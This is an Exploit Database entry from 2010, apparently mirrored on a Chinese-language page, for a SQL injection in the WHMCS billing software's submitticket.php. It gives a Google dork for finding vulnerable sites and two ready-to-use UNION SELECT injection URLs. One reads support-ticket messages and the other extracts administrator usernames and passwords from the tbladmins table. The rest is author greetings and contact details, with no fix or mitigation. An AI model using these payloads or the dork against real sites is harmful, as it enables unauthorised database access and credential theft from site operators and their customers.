WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) – SQL Injection

• Exploit Database
• 104 阅读

• 作者： Islam DefenDers
  日期： 2010-04-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12371/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  #=Info=======================================================================# # Software: WHMCS control (WHMCompleteSolution)Sql Injection# # # # Vulnerability: Remote Sql Injection # # Google Dork: Powered by WHMCompleteSolution - or "inurl:WHMCS# # Off. site: www.MiXaTy.com# #============================================================================#     #=Author==============================================# # Author: Islam DefenDers# # Date: 24.04.2010 # # Contact:email: hackereg@hotmail.com # #====================================================#   #=Sql Injection===========================================================================================================================================================# # Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20 # DOWNLOAD : http://www.whmcs.com/ # Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20 #=========================================================================================================================================================================#     #=Greetz==================================# #IsLam DefenDers Mr.HaMaDa # #=======================================#   HaMaDa SCoOoRPioN - DR.B@HY - MiXaTy TeaM - Islam DefenDers TeaM   site: www.mixaty.com   E: hackereg@hotmail.com